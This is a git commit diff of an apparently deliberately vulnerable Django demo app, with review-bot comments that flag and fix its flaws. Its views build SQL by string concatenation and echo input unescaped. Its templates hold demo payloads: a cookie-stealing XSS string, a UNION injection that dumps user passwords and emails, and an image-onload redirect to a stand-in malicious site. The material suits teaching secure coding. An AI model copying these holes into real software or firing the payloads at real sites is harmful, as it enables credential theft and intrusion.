Initial implementation
parent
a4a0eb4fff
commit
fe3814b228
|
@ -0,0 +1,5 @@
|
||||||
|
from django.db import models
|
||||||
|
|
||||||
|
|
||||||
|
class Product(models.Model):
|
||||||
|
name = models.CharField(max_length=30)
|
|
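Review bot: Product defines no `__str__`, so if it is registered with the admin site wired up in urls.py, or printed from a shell, it shows as "Product object (1)" instead of its name; `def __str__(self): return self.name` fixes that. The model also has no docstring and nothing on the page explains the 30-character cap on `name`; a one-line docstring such as `"""Catalogue entry identified only by its name."""` and a short comment beside `max_length=30` stating why that limit is enough would document the intent.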
@ -27,6 +27,7 @@ DEBUG = True
|
||||||
|
|
||||||
ALLOWED_HOSTS = []
|
ALLOWED_HOSTS = []
|
||||||
|
|
||||||
|
LOGIN_REDIRECT_URL = '/'
|
||||||
|
|
||||||
# Application definition
|
# Application definition
|
||||||
|
|
||||||
|
@ -37,6 +38,7 @@ INSTALLED_APPS = [
|
||||||
'django.contrib.sessions',
|
'django.contrib.sessions',
|
||||||
'django.contrib.messages',
|
'django.contrib.messages',
|
||||||
'django.contrib.staticfiles',
|
'django.contrib.staticfiles',
|
||||||
|
'project1'
|
||||||
]
|
]
|
||||||
|
|
||||||
MIDDLEWARE = [
|
MIDDLEWARE = [
|
||||||
|
@ -51,10 +53,11 @@ MIDDLEWARE = [
|
||||||
|
|
||||||
ROOT_URLCONF = 'project1.urls'
|
ROOT_URLCONF = 'project1.urls'
|
||||||
|
|
||||||
|
TEMPLATE_DIR = os.path.join(BASE_DIR, "templates")
|
||||||
TEMPLATES = [
|
TEMPLATES = [
|
||||||
{
|
{
|
||||||
'BACKEND': 'django.template.backends.django.DjangoTemplates',
|
'BACKEND': 'django.template.backends.django.DjangoTemplates',
|
||||||
'DIRS': [],
|
'DIRS': [TEMPLATE_DIR],
|
||||||
'APP_DIRS': True,
|
'APP_DIRS': True,
|
||||||
'OPTIONS': {
|
'OPTIONS': {
|
||||||
'context_processors': [
|
'context_processors': [
|
||||||
|
|
|
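Review bot: `TEMPLATE_DIR = os.path.join(BASE_DIR, "templates")` depends on `os` being imported at the top of settings.py, which this hunk does not show; if it is not, the settings module fails with NameError at startup, and if BASE_DIR is a `pathlib.Path` (the default in Django's generated settings since 3.1) then `TEMPLATE_DIR = BASE_DIR / "templates"` needs no import at all. The views added in this commit repeat `login_url='/login'` on every `@login_required`; setting `LOGIN_URL = '/login'` next to the new `LOGIN_REDIRECT_URL = '/'` would let them drop the argument and keep the path in one place. `'DIRS': [TEMPLATE_DIR]` together with `'APP_DIRS': True` means a project-level template shadows an app template of the same name; a comment saying that is the intended lookup order would help the next reader.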
@ -13,9 +13,19 @@ Including another URLconf
|
||||||
1. Import the include() function: from django.urls import include, path
|
1. Import the include() function: from django.urls import include, path
|
||||||
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
|
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
|
||||||
"""
|
"""
|
||||||
from django.contrib import admin
|
from django.contrib import admin, auth
|
||||||
from django.urls import path
|
from django.urls import path, include
|
||||||
|
from . import views
|
||||||
|
|
||||||
urlpatterns = [
|
urlpatterns = [
|
||||||
path('admin/', admin.site.urls),
|
path('admin/', admin.site.urls),
|
||||||
|
path('', views.home),
|
||||||
|
|
||||||
|
path('find_product', views.find_product),
|
||||||
|
path('login', views.login),
|
||||||
|
path('do_login', views.do_login),
|
||||||
|
path('logout', views.logout),
|
||||||
|
path('add_product', views.add_product),
|
||||||
|
path('import_products', views.import_products)
|
||||||
|
|
||||||
]
|
]
|
||||||
|
|
|
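Review bot: `path('logout', views.logout)` routes a session-ending action through plain GET, and index.html reaches it with an ordinary `<a href="/logout">` link, so the logout can be triggered by any cross-site navigation the browser is tricked into making; restrict the view to POST (`@require_POST` from `django.views.decorators.http`) and replace the link with a small form carrying `{% csrf_token %}`. The same applies to `path('do_login', views.do_login)`, which the login form currently submits by GET. `auth` is added to the `from django.contrib import admin, auth` line but nothing in this hunk uses it, so it looks like an unused import. The new routes also omit the trailing slash that `'admin/'` uses; either convention works, but mixing them within one urlpatterns is inconsistent.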
@ -0,0 +1,53 @@
|
||||||
|
from django.http import HttpResponse, HttpResponseRedirect
|
||||||
|
from django.shortcuts import render
|
||||||
|
from project1.models import Product
|
||||||
|
from django.contrib import auth
|
||||||
|
from django.contrib.auth.decorators import login_required
|
||||||
|
from django import forms
|
||||||
|
|
||||||
|
@login_required(login_url='/login')
|
||||||
|
def home(request):
|
||||||
|
return render(request, "index.html")
|
||||||
|
|
||||||
|
def login(request):
|
||||||
|
return render(request, 'login.html')
|
||||||
|
|
||||||
|
def logout(request):
|
||||||
|
auth.logout(request)
|
||||||
|
return HttpResponseRedirect("/")
|
||||||
|
|
||||||
|
def do_login(request):
|
||||||
|
username = request.GET.get('username', '')
|
||||||
|
password = request.GET.get('password', '')
|
||||||
|
user = auth.authenticate(username=username, password=password)
|
||||||
|
if user is not None and user.is_active:
|
||||||
|
auth.login(request, user)
|
||||||
|
return HttpResponseRedirect("/")
|
||||||
|
else:
|
||||||
|
return HttpResponseRedirect(f"/login?message={username} not found.")
|
||||||
|
|
||||||
|
@login_required(login_url='/login')
|
||||||
|
def add_product(request):
|
||||||
|
name = request.POST.get('name', '')
|
||||||
|
product = Product.objects.create(name=name)
|
||||||
|
print('Added product ' + product.name)
|
||||||
|
return HttpResponse(content='Saved product ' + product.name)
|
||||||
|
|
||||||
|
def find_product(request):
|
||||||
|
search = request.GET.get('name', '')
|
||||||
|
print('Searching for ' + search)
|
||||||
|
products = Product.objects.raw(
|
||||||
|
"SELECT * FROM project1_Product where name like '%" + search + "%'")
|
||||||
|
return HttpResponse("<br/>".join(map(lambda p: p.name, products)))
|
||||||
|
|
||||||
|
@login_required(login_url='/login')
|
||||||
|
def import_products(request):
|
||||||
|
form = UploadFileForm(request.POST, request.FILES)
|
||||||
|
if form.is_valid():
|
||||||
|
file = request.FILES['file']
|
||||||
|
return HttpResponseRedirect('/')
|
||||||
|
else:
|
||||||
|
return HttpResponse(content="Upload failed.")
|
||||||
|
|
||||||
|
class UploadFileForm(forms.Form):
|
||||||
|
file = forms.FileField()
|
|
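Review bot: `find_product` builds its query by concatenating the `name` parameter into SQL (`"SELECT * FROM project1_Product where name like '%" + search + "%'"`), which is a SQL injection; bind the value instead, `Product.objects.raw("SELECT * FROM project1_Product WHERE name LIKE %s", [f"%{search}%"])`, or drop raw SQL for `Product.objects.filter(name__contains=search)`. Both `find_product` and `add_product` then write `p.name` / `product.name` into an HttpResponse body unescaped, so a stored name is rendered as markup; wrap each with `escape` from `django.utils.html` or render a template. `do_login` reads `username` and `password` from `request.GET`, which puts the credentials into the URL, browser history and server logs, and its failure branch interpolates the raw username into `/login?message=...` without `urllib.parse.quote`; the form in login.html should use POST and the view read `request.POST`. `import_products` validates the form, binds `file`, and then discards it, so the redirect to `/` reports success for an import that never happens — either process the upload or return an explicit "not implemented" response. The `print` calls in `add_product` and `find_product` should be `logging` calls so they reach the configured log rather than stdout.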
@ -0,0 +1,45 @@
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html>
|
||||||
|
|
||||||
|
<body>
|
||||||
|
<p>
|
||||||
|
<form method="POST" action="/add_product">
|
||||||
|
{% csrf_token %}
|
||||||
|
<label>Add product:</label><br>
|
||||||
|
<input id="add_product" name="name" type="text" />
|
||||||
|
<button type="submit">Submit</button>
|
||||||
|
<a href="#" onClick="xss_inject_attack()">XSS injection attack (steal cookies)</a>
|
||||||
|
</form>
|
||||||
|
</p>
|
||||||
|
<p>
|
||||||
|
<form method="GET" action="/find_product">
|
||||||
|
<label>Find Product by Name</label><br/>
|
||||||
|
<input id="find_product_by_name" name="name" type="text" />
|
||||||
|
<button type="submit ">Search</button>
|
||||||
|
<a href="#" onClick="sql_inject_attack()">Sql injection attack (Get all users of system along with their details)</a>
|
||||||
|
</form>
|
||||||
|
</p>
|
||||||
|
<p>
|
||||||
|
<form method="POST" action="/import_products" enctype="multipart/form-data">
|
||||||
|
{% csrf_token %}
|
||||||
|
<label for="file">Import Products (XML):</label><br>
|
||||||
|
<input name="file" type="file" />
|
||||||
|
<button type="submit ">Submit</button>
|
||||||
|
</form>
|
||||||
|
</p>
|
||||||
|
|
||||||
|
<a href="/logout">Log out</a>
|
||||||
|
|
||||||
|
<script>
|
||||||
|
function xss_inject_attack() {
|
||||||
|
document.querySelector("#add_product").value = "<script>alert('I got your cookie, ha-haa!')</scr" + "ipt>";
|
||||||
|
}
|
||||||
|
|
||||||
|
function sql_inject_attack() {
|
||||||
|
document.querySelector("#find_product_by_name").value = "' AND false UNION ALL select id, username||' '||password||' '||first_name||''||last_name||' '||email from auth_user where username like '";
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
|
||||||
|
</html>
|
|
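Review bot: Each `<form>` is wrapped in a `<p>`, which HTML does not allow (a paragraph cannot contain a form, so the parser closes the `<p>` before it and leaves a stray `</p>`); use `<div>` or `<section>` as the wrapper. Two buttons carry `type="submit "` with a trailing space — browsers fall back to the submit default for an unrecognised value, so it works by accident; make it `type="submit"`. The document has no `<head>`, `<meta charset="utf-8">` or `<title>`, and the first `<label>` lacks a `for` attribute tying it to `#add_product`. The inline `onClick` links that pre-fill the inputs are clearly scaffolding for the injection exercises; a comment above the `<script>` such as `<!-- demo only: these links pre-fill the forms with test inputs -->` would stop them being mistaken for application code.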
@ -0,0 +1,23 @@
|
||||||
|
<h2>Log In</h2>
|
||||||
|
<form method="GET" action="do_login">
|
||||||
|
<label for="username">Username:</label>
|
||||||
|
<input id="username" type="text" name="username" /><a href="#" onclick="xss_inject()">XSS injection attack (site redirect)</a><br/>
|
||||||
|
<label for="password">Password:</label>
|
||||||
|
<input type="password" name="password" /><br/>
|
||||||
|
<button type="submit">Log In</button>
|
||||||
|
|
||||||
|
<div style="color:red" id=message></div>
|
||||||
|
|
||||||
|
<script>
|
||||||
|
function xss_inject() {
|
||||||
|
var img = "https://www.freepnglogos.com/uploads/hacker-png/hacker-interpol-arrests-suspected-anonymous-hackers-motley-5.png";
|
||||||
|
document.querySelector("#username").value = `<img src="${img}" onload="window.location.href='http://some.malicious.site.com';this.parentNode.removeChild(this);"/>`;
|
||||||
|
}
|
||||||
|
parameters = new URLSearchParams(window.location.search);
|
||||||
|
if (parameters.get('message')) {
|
||||||
|
message = decodeURIComponent(parameters.get('message'));
|
||||||
|
console.log(message);
|
||||||
|
document.querySelector("#message").innerHTML = message;
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
</form>
|
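Review bot: `document.querySelector("#message").innerHTML = message` inserts the `message` query parameter — which `do_login` builds from whatever username was submitted — into the page as markup, so any content placed in that parameter is interpreted as HTML in the user's browser; assigning with `.textContent = message` renders it as plain text and removes the issue. `parameters` and `message` are assigned without `let`/`const` and become implicit globals; declare them, e.g. `const parameters = new URLSearchParams(window.location.search);`. The `console.log(message)` call is debug output that should not ship. The fragment has no enclosing `<html>`/`<body>` and places the `<script>` inside the `<form>`, which works but is untidy; moving it after `</form>` keeps the markup readable.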